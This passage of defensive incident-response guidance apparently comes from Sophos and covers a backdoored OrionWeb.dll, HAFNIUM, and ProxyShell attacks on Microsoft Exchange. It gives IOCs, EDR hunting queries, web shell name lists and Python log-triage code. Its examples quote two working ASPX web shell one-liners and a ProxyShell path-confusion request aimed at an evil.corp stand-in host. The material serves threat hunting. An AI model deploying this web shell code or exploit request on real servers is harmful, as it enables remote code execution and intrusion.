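    dd_off = 112 if pe32plus else 96
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<I", opt, dd_off - 4, 16)        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, dd_off + 4 * 8,        # security directory
                     0x1000 if security_size else 0, security_size)
    struct.pack_into("<II", opt, dd_off + 14 * 8, 0x2008, 0x48)  # CLR header
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    signed = build_sample_pe(security_size=0x1800)
    stripped = build_sample_pe(security_size=0)
    good = {hashlib.sha256(signed).hexdigest()}
    print(assess_assembly(signed, good))     # suspicious: False
    print(assess_assembly(stripped, good))   # suspicious: True
```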

We hope the details shared through this casebook as well as the IOAs and IOCs below enable threat hunters around the globe to look for similar malicious modifications of OrionWeb.dll and other .NET assemblies, which will aid in better protection for all.

Learn more

For more information on the Sophos MTR service, speak with one of the security experts at Spear Shield.

If you prefer to conduct your own threat hunts Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Speak with the team at Spear Shield to start a 30-day no obligation trial today.


Description                       Indicator
Web shell SHA256 (about.aspx)     f39dc0dfd43477d65c1380a7cff89296ad72bfa7fc3afcfd8e294f195632030e
Sophos detection for web shell    Troj/WebShel-H
C2 IPv4s
Backdoored OrionWeb.dll SHA256    a25fc5af86296dcd5bb41668443a36947bccd17a1687f9b118675f1503b3e376
Sophos detection for .dll         Mal/Generic-S + Troj/MSIL-QJK



ID                Tactic                Technique
T1047             Execution             Windows Management Instrumentation
T1059.001/.003    Execution             Command and Scripting Interpreter
T1505.003         Persistence           Server Software Component: Web Shell
T1554             Persistence           Compromise Client Software Binary
T1078.002         Privilege Escalation  Valid Accounts: Domain Accounts
T1070.004/.006    Defense Evasion       Indicator Removal on Host
T1003.003         Credential Access     OS Credential Dumping: NTDS
T1556             Credential Access     Modify Authentication Process
T1087.002         Discovery             Account Discovery: Domain Account
T1570             Lateral Movement      Lateral Tool Transfer
T1056.003         Collection            Input Capture: Web Portal Capture
T1071.001         Command and Control   Application Layer Protocol: Web Protocols
T1571             Command and Control   Non-Standard Port


Intercept X EDR

Live Discover Query

Peter Mackenzie: In Sophos Rapid Response, we would use the query below to get started. This has 3 variables (begin, end, cmd) so you can set the date range you are looking at as well as the command you are looking for. For example you might start by looking for the string: % wmic /user:"%"%

Allowing for a wildcard at the start and end, as well as for any username. This would likely bring back any results where wmic was being used with someone’s credentials. The query itself brings back lots of useful information from our journals, including when the file was created, and which user executed the command.

SELECT
CAST(strftime('%Y-%m-%dT%H:%M:%SZ',datetime(spj.time,'unixepoch')) AS TEXT) DATE_TIME,
strftime('%Y-%m-%dT%H:%M:%SZ',datetime(f.btime,'unixepoch')) AS First_Created_On_Disk,
strftime('%Y-%m-%dT%H:%M:%SZ',datetime(f.ctime,'unixepoch')) AS Last_Changed,
strftime('%Y-%m-%dT%H:%M:%SZ',datetime(f.mtime,'unixepoch')) AS Last_Modified,
strftime('%Y-%m-%dT%H:%M:%SZ',datetime(f.atime,'unixepoch')) AS Last_Accessed,
strftime('%Y-%m-%dT%H:%M:%SZ',datetime(spj.processStartTime,'unixepoch')) AS Process_Start_Time,
-- endTime is 0 (the Unix epoch) for a process that is still running
CASE WHEN spj.endTime IS NULL OR spj.endTime = 0
THEN '-' ELSE strftime('%Y-%m-%dT%H:%M:%SZ',datetime(spj.endTime,'unixepoch')) END AS Process_End_Time,
-- user and command line from the joined tables
u.username AS Username,
spj.cmdline AS Command_Line
FROM sophos_process_journal spj
JOIN file f ON spj.pathname = f.path
JOIN users u ON spj.sid = u.uuid
WHERE spj.time >= CAST($$begin$$ AS INT)
AND spj.time <= CAST($$end$$ AS INT)
AND spj.cmdline LIKE '$$cmd$$';


I would like to thank (in no particular order) Fraser Howard, Guido Denzler, Gabe Renfro, Jordon Carpenter, Tyler Wojcik, Jordan Konicki, Steven Lott, Mat Gangwer, Alemdar Halis, and Savio Lau for their efforts in detecting, investigating, and responding to this novel threat.

Nation-State HAFNIUM attack stopped


Update: Microsoft released new security updates for Exchange Server on April 13th (CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, and CVE-2021-28483). The updates address bugs reported to Microsoft by the NSA and are considered urgent fixes that should be addressed immediately.

On March 2nd, zero-day vulnerabilities affecting Microsoft Exchange were publicly disclosed. These vulnerabilities are being actively exploited in the wild by HAFNIUM, a threat actor believed to be a nation state.


What is HAFNIUM?

According to a CISA alert:

Microsoft has released out-of-band security updates to address vulnerabilities affecting Microsoft Exchange Server 2013, 2016, and 2019. A remote attacker can exploit three remote code execution vulnerabilities—CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065—to take control of an affected system and can exploit one vulnerability—CVE-2021-26855—to obtain access to sensitive information. These vulnerabilities are being actively exploited in the wild.

CISA also issued an emergency directive urging organizations to patch on-premises Exchange Servers and search their networks for indicators of attack.

For an overview of HAFNIUM, and advice on how you should respond, watch this short video from Mat Gangwer, the head of the Sophos Managed Threat Response (MTR) team.

For a deep dive into HAFNIUM and the steps you can take to address the threat, watch our recent webinar session:


For details of the Sophos protections against the exploitation of these vulnerabilities, click here.

UPDATE: Other threat actors are now taking advantage of the persistence established by Hafnium to conduct a range of attacks. One actor is installing a new ransomware variant called DearCry.

It is important to note that patching only protects your organization from being exploited by the vulnerabilities going forward. It does NOT ensure that an adversary has not already exploited the vulnerabilities.

What should you do?

1. Patch or disable

Patch all on-premises Microsoft Exchange servers in your environment with the relevant security update. Details can be found on Microsoft’s Exchange Team blog.

If you are unable to patch, implement an IIS Re-Write Rule and disable Unified Messaging (UM), Exchange Control Panel (ECP) VDir, and Offline Address Book (OAB) VDir Services. Details can be found in Microsoft’s Security Response Center blog.

Sophos recommends you backup Exchange IIS/Server logs before patching and updating.

2. Determine possible exposure

Download and run the Test-ProxyLogon.ps1 script provided by the Microsoft Customer Support Services team to determine possible exposure. Details on interpreting the results of this script can be found in this Microsoft article, a few paragraphs into the “Have I been compromised?” section.

It is important to note that even with the patches installed, this will not address the presence of any malicious web shells. It is for this reason we recommend the use of Microsoft’s script to identify affected servers and look for the presence of web shells.

Test-ProxyLogon.ps1 can output multiple .csv files per Exchange server, depending on what it finds. These .csv files can be viewed in a text editor or spreadsheet application.

The script will look for evidence of each vulnerability being abused, creating a .csv per CVE. It will also look for suspicious files (which may be web shells) which should be reviewed, and calculate how many days back in the logs it can identify potential abuse of the vulnerabilities.

Our most common observations are related to output for CVE-2021-26855.

Hosts that may have been exploited by CVE-2021-26855 will be listed in the file [HOSTNAME]-Cve-2021-26855.csv

The “ClientIpAddress” column will list the source IP addresses of potential attackers.

The “AnchorMailbox” column will list a path to various applications running on Exchange that may have been targeted. To reveal what actions may have been taken by the attacker, you will need to extract the relevant application from AnchorMailbox.
e.g. for “ServerInfo~a]@[REDACTED]:444/autodiscover/autodiscover.xml?#” the relevant application is /autodiscover/

To determine what actions were taken by the adversary, you will need to look at the logs in %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\{application}
e.g. %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\autodiscover\

The “DateTime” column in [HOSTNAME]-Cve-2021-26855.csv will provide you with a timestamp when the potential exploitation took place, to use when referencing the log files.
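As an added example (not Microsoft's or Sophos's code), the Python below triages a [HOSTNAME]-Cve-2021-26855.csv the way the steps above describe: it extracts the application from AnchorMailbox, builds the Exchange log directory to review next, and groups hits by source IP. The CSV content is constructed and reduced to the three columns the text names.

```python
"""Added example: triage of Test-ProxyLogon.ps1's Cve-2021-26855 CSV output.
The sample CSV below is constructed (DateTime, ClientIpAddress, AnchorMailbox)."""
import csv
import io
import re
from typing import Dict, List, Optional

SAMPLE_CSV = """DateTime,ClientIpAddress,AnchorMailbox
2021-03-03T02:11:09.532Z,198.51.100.7,ServerInfo~a]@[REDACTED]:444/autodiscover/autodiscover.xml?#
2021-03-03T02:11:15.001Z,198.51.100.7,ServerInfo~a]@[REDACTED]:444/ecp/DDI/DDIService.svc/SetObject?#
2021-03-03T02:12:40.118Z,203.0.113.21,ServerInfo~a]@[REDACTED]:444/mapi/nspi/?#
"""

EXCHANGE_LOGGING = r"%PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging"

# AnchorMailbox looks like "ServerInfo~a]@[host]:444/<application>/..."; the
# first path segment after the port names the application whose logs to read.
ANCHOR_RE = re.compile(r":\d+(/[^/?#]+)")


def application_from_anchor(anchor: str) -> Optional[str]:
    """'ServerInfo~a]@[REDACTED]:444/autodiscover/autodiscover.xml?#' -> '/autodiscover/'."""
    match = ANCHOR_RE.search(anchor)
    if not match:
        return None
    return match.group(1) + "/"


def log_directory(application: str) -> str:
    # '/autodiscover/' -> %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\autodiscover
    return EXCHANGE_LOGGING + "\\" + application.strip("/")


def triage(csv_text: str) -> List[Dict[str, Optional[str]]]:
    """One record per CSV row with the derived application and log directory."""
    records = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        app = application_from_anchor(row["AnchorMailbox"])
        records.append({
            "when": row["DateTime"],
            "client_ip": row["ClientIpAddress"],
            "application": app,
            "log_dir": log_directory(app) if app else None,
        })
    return records


def summarize_by_client(records) -> Dict[str, dict]:
    """Per source IP: first and last timestamp plus the applications it reached."""
    summary: Dict[str, dict] = {}
    for rec in records:
        entry = summary.setdefault(rec["client_ip"], {
            "first_seen": rec["when"], "last_seen": rec["when"], "applications": set()})
        # ISO-8601 strings of the same shape sort correctly as plain strings
        entry["first_seen"] = min(entry["first_seen"], rec["when"])
        entry["last_seen"] = max(entry["last_seen"], rec["when"])
        if rec["application"]:
            entry["applications"].add(rec["application"])
    for entry in summary.values():
        entry["applications"] = sorted(entry["applications"])
    return summary


if __name__ == "__main__":
    for ip, entry in summarize_by_client(triage(SAMPLE_CSV)).items():
        print(ip, entry["first_seen"], entry["last_seen"], entry["applications"])
```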

3. Look for web shells or other suspicious .aspx files.

Web shells have been observed in the following directories:

    • <volume>\inetpub\wwwroot\aspnet_client\
      • e.g. C:\inetpub\wwwroot\aspnet_client\
    • <volume>\inetpub\wwwroot\aspnet_client\system_web\
    • <exchange install path>\FrontEnd\HttpProxy\owa\auth\
      • e.g. C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
    • <exchange install path>\FrontEnd\HttpProxy\owa\auth\Current\
    • <exchange install path>\FrontEnd\HttpProxy\owa\auth\<folder with version number>\

Common names for these web shells include:

  • (8 random letters and numbers)
    • Regex: [0-9a-zA-Z]{8}.aspx
  • aspnet_client.aspx
  • aspnet_iisstart.aspx
  • aspnet_www.aspx
  • aspnettest.aspx
  • discover.aspx
  • document.aspx
  • error.aspx
  • errorcheck.aspx
  • errorEE.aspx
  • errorEEE.aspx
  • errorEW.aspx
  • errorFF.aspx
  • healthcheck.aspx
  • help.aspx
  • HttpProxy.aspx
  • Logout.aspx
  • MultiUp.aspx
  • one.aspx
  • OutlookEN.aspx
  • OutlookJP.aspx
  • OutlookRU.aspx
  • RedirSuiteServerProxy.aspx
  • shell.aspx
  • shellex.aspx
  • supp0rt.aspx
  • system_web.aspx
  • t.aspx
  • TimeoutLogout.aspx
  • web.aspx
  • xx.aspx

4. Query with Sophos EDR

If you are using Sophos EDR, you can leverage the following example queries to identify potential web shells to investigate, check the patch level of your servers, and look for suspicious commands from child processes of w3wp.exe (the Microsoft IIS web server worker process used by Exchange).

/* Query for known web shell names */
SELECT path, filename,
datetime(btime,'unixepoch') AS created_time,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE (path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%')
AND filename IN ('web.aspx','help.aspx','document.aspx','errorEE.aspx','errorEEE.aspx','errorEW.aspx','errorFF.aspx','healthcheck.aspx','aspnet_www.aspx','aspnet_client.aspx','xx.aspx','shell.aspx','aspnet_iisstart.aspx','one.aspx','errorcheck.aspx','t.aspx','discover.aspx','aspnettest.aspx','error.aspx','RedirSuiteServerProxy.aspx','shellex.aspx','supp0rt.aspx','HttpProxy.aspx','system_web.aspx','OutlookEN.aspx','TimeoutLogout.aspx','Logout.aspx','OutlookJP.aspx','MultiUp.aspx','OutlookRU.aspx');

/* Query for web shells with randomized 8 character names */
SELECT path,
datetime(btime,'unixepoch') AS created_time,
regex_match(filename, '^[0-9a-zA-Z]{8}\.aspx$', 0) AS filename,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE (path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%');

When reviewing the potential web shells identified by the queries, the web shell will typically appear inside an Exchange Offline Address Book (OAB) configuration file, in the ExternalUrl field. E.g.

ExternalUrl : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["key-here"],"unsafe");}</script>
ExternalUrl: http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>

5. Establish impact

Review process activity and command executions from the time the web shell was created onwards. Investigate w3wp.exe (the IIS web server worker process) activity and any instances of csc.exe (the C# compiler) running as a child process. This should yield trailheads to establish impact. The following Sophos EDR Live Discover query will aid you in identifying activity of this nature.

/* MULTI - Query for patch level, web shells, and suspicious commands */
SELECT '----------------------' Test, '----------------------' Result, '----------------------' Evidence UNION ALL
-- Check the version of Exchange that is running, to determine if it's patched
SELECT 'Check Exchange Version to confirm Patch' Test,
CASE product_version
WHEN '15.0.1497.12' THEN 'Patched'
WHEN '15.1.2106.13' THEN 'Patched'
WHEN '15.1.2176.9' THEN 'Patched'
WHEN '15.1.2242.4' THEN 'Patched'
WHEN '15.2.721.13' THEN 'Patched'
WHEN '15.2.792.10' THEN 'Patched'
WHEN '15.2.858.5' THEN 'Patched'
ELSE 'Not a listed patched build - verify manually'
END Result,
'Product_Version: ' || Product_version Evidence
FROM file
WHERE path = ( (SELECT data FROM registry
WHERE key = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ExchangeServer\v15\Setup' AND path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ExchangeServer\v15\Setup\MsiInstallPath'
) || 'bin\Microsoft.Exchange.RpcClientAccess.Service.exe') UNION ALL
-- Identify common web shells which may exist. Files with creation dates after Feb 28, 2021 should be reviewed.
SELECT 'List of Suspect Web Shell files (if any).' Test,
CAST(GROUP_CONCAT(filename || CHAR(10)) AS TEXT) Result,
CAST(GROUP_CONCAT('PATH: ' || path || CHAR(10) || 'CREATED ON: ' || DATETIME(btime,'unixepoch') || CHAR(10)) AS TEXT) Evidence
FROM file
WHERE (path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR
path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%') AND
(filename IN ('web.aspx','help.aspx','document.aspx','errorEE.aspx','errorEEE.aspx','errorEW.aspx','errorFF.aspx','healthcheck.aspx','aspnet_www.aspx','aspnet_client.aspx','xx.aspx','shell.aspx','aspnet_iisstart.aspx','one.aspx','errorcheck.aspx','t.aspx','discover.aspx','aspnettest.aspx','error.aspx','RedirSuiteServerProxy.aspx','shellex.aspx','supp0rt.aspx','HttpProxy.aspx','system_web.aspx','OutlookEN.aspx','TimeoutLogout.aspx','Logout.aspx',
'OutlookJP.aspx','MultiUp.aspx','OutlookRU.aspx') OR
-- 8 random characters plus '.aspx' is 13 characters
(LENGTH(filename) = 13) ) UNION ALL
-- Identify the common pattern for commands being executed from a web shell. This is looking over the last 15 days, but can be adjusted.
SELECT 'Suspicious Commands Detected as Child Process' Test,
'Found a Suspicious Command Which Could Have Spawned from a Web Shell' Result,
DateTime(time, 'unixepoch') || ',' || sophosPID || ',' || processname || ',' || cmdline Evidence
FROM sophos_process_journal spj WHERE LOWER(spj.processname) IN ('cmd.exe','powershell.exe', 'csc.exe') AND time > strftime('%s','now','-15 days') AND
(SELECT LOWER(processname) FROM sophos_process_journal spj2 WHERE spj2.sophosPID = spj.parentSophosPID) IN ('w3wp.exe', 'umworkerprocess.exe');

How Sophos Managed Threat Response (MTR) can help

Threats such as HAFNIUM are a great example of the peace of mind you get knowing your organization is backed by an elite team of threat hunters and response experts.

When the HAFNIUM news broke, the Sophos MTR team immediately began to hunt and investigate in customer environments to determine if there was any activity related to the attack. Additionally, they also looked to uncover any new artifacts or IoCs related to the attack that could provide further protection for all Sophos customers.

The 24/7 nature of Sophos MTR meant that not a single second was wasted before the team got to work, ensuring our customers were protected.

SophosLabs has also published detections related to the known activity and IOCs related to the Exchange vulnerability. This is in addition to previous protections already in place to detect post-exploit activity.

Concerned about HAFNIUM? Contact the team at Spear Shield today to ensure that any potential adversarial activity in your environment is identified and neutralized.

Being Proactive with ProxyShell

ProxyShell vulnerabilities in Microsoft Exchange: What to do

The vulnerabilities lie in the Microsoft Client Access Service (CAS), which is commonly exposed to the public internet. This exposure has led to widespread exploitation by threat actors.

Last updated 2021-09-23 UTC 11.26


Threat actors are actively scanning and exploiting vulnerable Microsoft Exchange servers that have not applied security patches released earlier this year.

ProxyShell, the name given to a collection of vulnerabilities for Microsoft Exchange servers, enables an actor to bypass authentication and execute code as a privileged user.

ProxyShell comprises three separate vulnerabilities used as part of a single attack chain:

  • CVE-2021-34473
    Pre-auth path confusion vulnerability to bypass access control
    Patched in KB5001779, released in April
  • CVE-2021-34523
    Privilege elevation vulnerability in the Exchange PowerShell backend
    Patched in KB5001779, released in April
  • CVE-2021-31207
    Post-auth remote code execution via arbitrary file write
    Patched in KB5003435, released in May

The vulnerabilities lie in the Microsoft Client Access Service (CAS) that typically runs on port 443 in IIS (Microsoft’s web server). CAS is commonly exposed to the public internet to enable users to access their email via mobile devices and web browsers. This exposure has led to widespread exploitation by threat actors who are commonly deploying web shells to remotely execute arbitrary code on compromised devices, similar to that seen in the HAFNIUM attack.

What should you do?

Watch the video above as Mat Gangwer, head of the Sophos Managed Threat Response (MTR) team, shares details about the threat and offers advice about how to respond.

If you are using Microsoft Exchange server:

  1. Back up Exchange IIS/Server logs and ensure you have applied the July 2021 security updates for Microsoft Exchange
    • Patching only ensures that the vulnerability cannot be further exploited. If you have already been breached, the software patches do not address post-exploit behavior by a threat actor
  2. (For non Sophos MTR customers) Identify and investigate your exposure windows for adversarial activity
    • Identify and delete web shells and malicious binaries
    • Review process activity for instances of w3wp.exe
    • Identify and remove any persistence established by an actor
  3. Ensure endpoint protection is deployed on all endpoints and servers. Verify that all protections have been enabled and your exclusions are kept to a minimum

Sophos detections

Sophos customers are protected by multiple detections for the exploitation of these vulnerabilities. They can be used by threat hunters to perform searches in their own environments. Detections include:

  • Troj/ASPDoor-Y (detects malicious PST files)
  • Troj/ASPDoor-AF (detects malicious PST files)
  • Troj/Agent-BHPF
  • Troj/Agent-BHQD (detects the binary component of LockFile ransomware)
  • Troj/WebShel-M
  • Troj/KillAV-IT
  • App/HamaKaze-A
  • App/HamaKaze-B
  • CXmal/WebAgnt-A (detects malicious PST files in the context of customers’ environments)

SophosLabs has also published IPS signatures:

CVE              Sophos XG / Sophos Firewall    EIPS      SG UTM
CVE-2021-34473   2305889, 2305807, 2305979      2305807   57906, 57907, 57908, 57909

In addition, on August 24th, SophosLabs released a new, more generic signature 2305979 to detect attempted vulnerability exploit in Microsoft Exchange server.

LockFile is a new ransomware family that appears to exploit the ProxyShell vulnerabilities to breach targets with unpatched, on-premises Microsoft Exchange servers. SophosLabs has released additional behavior-based protection for LockFile provided by the Mem/LockFile-A detection for Windows devices running Sophos endpoint and server protection managed through Sophos Central.

Determining impact with Sophos XDR

1. Investigate exposure

Verifying current Microsoft Exchange version

To determine whether you are running an unpatched version of Exchange or not, the below XDR query for live Windows devices will produce a table of Exchange servers, their current version, and guidance whether they need patching or not.

The version numbers identified in the below query were gathered from this Microsoft article.

SELECT 'Check Exchange Version to confirm Patch. Manually verify build number from MS documentation.' Note,
CASE product_version
WHEN '15.2.922.13' THEN 'Exchange 2019 CU10 Jul21 patched against ProxyShell'
WHEN '15.2.922.7' THEN 'Exchange 2019 CU10 patched against ProxyShell. Recommend also updating with recent July Patch.'
WHEN '15.2.858.15' THEN 'Exchange 2019 CU9 Jul21 patched against ProxyShell'
WHEN '15.2.858.12' THEN 'Exchange 2019 CU9 May21 patched against ProxyShell. Recommend also updating with recent July Patch.'
WHEN '15.1.2308.14' THEN 'Exchange 2016 CU21 Jul21 patched against ProxyShell'
WHEN '15.1.2308.8' THEN 'Exchange 2016 CU21 patched against ProxyShell. Recommend also updating with recent July Patch.'
WHEN '15.1.2242.12' THEN 'Exchange 2016 CU21 Jul21 patched against ProxyShell.'
WHEN '15.1.2242.10' THEN 'Exchange 2016 CU20 May21 patched against ProxyShell. Recommend also updating with recent July Patch.'
WHEN '15.1.2176.14' THEN 'Exchange 2016 CU19 May21 patched against ProxyShell. Recommend also updating with recent July Patch.'
WHEN '15.0.1497.23' THEN 'Exchange 2013 CU23 Jul21 patched against ProxyShell.'
WHEN '15.0.1497.18' THEN 'Exchange 2013 CU23 May21 patched against ProxyShell. Recommend also updating with recent July Patch.'
ELSE 'Build not in the patched list - verify manually against MS documentation'
END Result,
'Product_Version: ' || Product_version Evidence
FROM file
-- MsiInstallPath is the install directory; the version is read from a binary inside it
WHERE path = ( (SELECT data FROM registry
WHERE key = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ExchangeServer\v15\Setup' AND path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ExchangeServer\v15\Setup\MsiInstallPath'
) || 'bin\Microsoft.Exchange.RpcClientAccess.Service.exe');

Analyze IIS logs for autodiscover.json abuse

As these vulnerabilities lie in the Exchange Client Access Service (CAS) which runs over IIS (web server), reviewing the IIS logs will reveal attempted and successful exploitation of the ProxyShell vulnerabilities. HTTP requests inbound to the IIS server will be detailed including the request type and path.

By default, IIS logs are written to C:\inetpub\logs\LogFiles\

A common artifact seen in these logs for abuse of CVE-2021-34473 is the presence of &Email=autodiscover/autodiscover.json in the request path, which confuses the Exchange proxy into stripping the wrong part of the URL.

E.g. GET /autodiscover/autodiscover.json @evilcorp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp

The below XDR query for live Windows devices will query the IIS logs on disk for any lines that contain the string ‘autodiscover.json’.

Should you later identify web shells, this same query can be repurposed to query for the web shell file name to reveal requests made to the web shell – simply change ‘autodiscover.json’ to ‘webshell_name.aspx’. Please note that this query can be slow depending on the volume of logs it needs to parse.

SELECT grep.*
FROM file
CROSS JOIN grep ON (grep.path = file.path)
-- IIS logs are named u_exYYMMDD.log; these two patterns cover Aug/Sep 2021.
-- SQLite LIKE has no [..] character classes, so one LIKE per month is needed.
WHERE (file.path LIKE 'C:\inetpub\logs\LogFiles\W3SVC%\u_ex2108%'
OR file.path LIKE 'C:\inetpub\logs\LogFiles\W3SVC%\u_ex2109%')
AND grep.pattern = 'autodiscover.json'
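The request pattern above, and the web shell file requests the same logs would reveal, can also be hunted offline once the IIS logs have been collected. As an added example (not Sophos's code), the Python below parses W3C IIS log lines and flags the autodiscover.json path-confusion request together with .aspx requests in the directories where web shells are dropped; the log lines are constructed and follow the default IIS #Fields layout.

```python
"""Added example: hunt ProxyShell and web shell requests in W3C IIS logs.
The SAMPLE_LOG lines are constructed; hosts and IPs are documentation ranges."""
import re
from typing import Dict, FrozenSet, Iterable, List

SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-08-21 03:14:02 10.0.0.5 GET /owa/auth/logon.aspx url=https://mail.example.test/owa/ 443 - 192.0.2.10 Mozilla/5.0 - 200 0 0 31
2021-08-21 03:15:11 10.0.0.5 GET /autodiscover/autodiscover.json @evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp 443 - 198.51.100.7 python-requests/2.26 - 200 0 0 129
2021-08-21 03:15:12 10.0.0.5 POST /autodiscover/autodiscover.json @evil.corp/powershell/?&Email=autodiscover/autodiscover.json%3F@evil.corp 443 - 198.51.100.7 python-requests/2.26 - 200 0 0 840
2021-08-21 03:16:40 10.0.0.5 POST /aspnet_client/Kd8Zq2Lm.aspx - 443 - 198.51.100.7 python-requests/2.26 - 200 0 0 57
2021-08-21 03:20:00 10.0.0.5 GET /owa/auth/Current/themes/resources/logon.css - 443 - 192.0.2.10 Mozilla/5.0 - 200 0 0 3
"""

# CVE-2021-34473: the Email= parameter re-points the request at autodiscover.json
PROXYSHELL_RE = re.compile(r"email=autodiscover/autodiscover\.json", re.IGNORECASE)
# Directories where web shells have been observed (see the path list above)
WEBSHELL_DIRS = ("/aspnet_client/", "/owa/auth/", "/ecp/auth/")
# 8 random letters/digits followed by ".aspx"
RANDOM_NAME_RE = re.compile(r"^[0-9a-z]{8}\.aspx$", re.IGNORECASE)


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Turn W3C extended log lines into dicts keyed by the #Fields names."""
    fields: List[str] = []
    records = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # IIS may re-emit this header mid-file
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if len(values) != len(fields):          # skip malformed lines rather than misalign columns
            continue
        records.append(dict(zip(fields, values)))
    return records


def classify(rec: Dict[str, str], webshell_names: FrozenSet[str] = frozenset()) -> List[str]:
    """Return the reasons a request is interesting; an empty list means nothing matched."""
    stem = rec.get("cs-uri-stem", "").lower()
    query = rec.get("cs-uri-query", "")
    tags: List[str] = []
    if stem.endswith("/autodiscover/autodiscover.json") and PROXYSHELL_RE.search(query):
        tags.append("proxyshell-cve-2021-34473")
    if stem.endswith(".aspx") and any(d in stem for d in WEBSHELL_DIRS):
        name = stem.rsplit("/", 1)[-1]
        if RANDOM_NAME_RE.match(name):
            tags.append("webshell-random-name")
        if "/aspnet_client/" in stem:            # no legitimate .aspx pages live here
            tags.append("webshell-aspnet_client")
        if name in webshell_names:
            tags.append("webshell-known-name")
    return tags


def hunt(log_text: str, webshell_names: FrozenSet[str] = frozenset()) -> List[Dict[str, object]]:
    """Parse a log and return only the flagged requests with their context."""
    hits = []
    for rec in parse_w3c(log_text.splitlines()):
        tags = classify(rec, webshell_names)
        if tags:
            hits.append({"time": rec.get("date", "") + " " + rec.get("time", ""),
                         "client": rec.get("c-ip", ""), "method": rec.get("cs-method", ""),
                         "stem": rec.get("cs-uri-stem", ""), "query": rec.get("cs-uri-query", ""),
                         "tags": tags})
    return hits


if __name__ == "__main__":
    # Known names are lower-cased to match the lower-cased stem; a few from the list above.
    for hit in hunt(SAMPLE_LOG, frozenset({"help.aspx", "discover.aspx", "supp0rt.aspx"})):
        print(hit["time"], hit["client"], hit["method"], hit["stem"], hit["tags"])
```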

Windows Events for New-MailboxExportRequest abuse

CVE-2021-31207 enables a threat actor to write files to disk by abusing a feature of the Exchange PowerShell backend, specifically the New-MailboxExportRequest cmdlet. This cmdlet enables an email to be written to disk, using a UNC path, that contains an arbitrary email attachment. This has been the primary method used to deliver a web shell to a compromised device.

Windows Event logs for MSExchange Management typically log usage of New-MailboxExportRequest. By reviewing these logs, the locations of web shells can be ascertained.

The below XDR query for live Windows devices will query the Windows Event logs from the past 14 days for any events that detail usage of this cmdlet and the parameters of the command (including file path).

SELECT datetime(time, 'unixepoch') AS event_time, source, data
FROM sophos_windows_events
WHERE source = 'MSExchange Management'
AND time > strftime('%s', 'now', '-14 days')
AND data LIKE '%MailboxExportRequest%'

2. Identify suspicious web shells and binaries

Adversaries exploiting these vulnerabilities are dropping web shells onto the compromised device, through which they can issue additional commands such as downloading and executing malicious binaries (such as .exe or .dll files).

As these vulnerabilities lie in CAS which runs on IIS, adversarial activity will stem from a w3wp.exe process, a worker process for IIS.

Web shells on disk

The below XDR query for live Windows devices looks at directories where adversaries are dropping web shells which may still be present on disk. Review any unexpected or recently created .aspx files that are present in the output of the query.
E.g.  C:\inetpub\wwwroot\aspnet_client\654253568.aspx

SELECT sf.path, datetime(sf.btime, 'unixepoch') AS created_time, sf.size, sh.sha256
FROM file sf
LEFT JOIN hash sh
ON sf.path = sh.path
WHERE sf.path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%.aspx'
OR sf.path LIKE 'C:\inetpub\wwwroot\aspnet_client\%.aspx'
OR sf.path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%.aspx'
OR sf.path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth\%.aspx'
OR sf.path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\current\%.aspx'
OR sf.path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\current\themes\%.aspx'
OR sf.path LIKE 'C:\ProgramData\%.aspx'
OR sf.path LIKE 'C:\ProgramData\%\%.aspx'

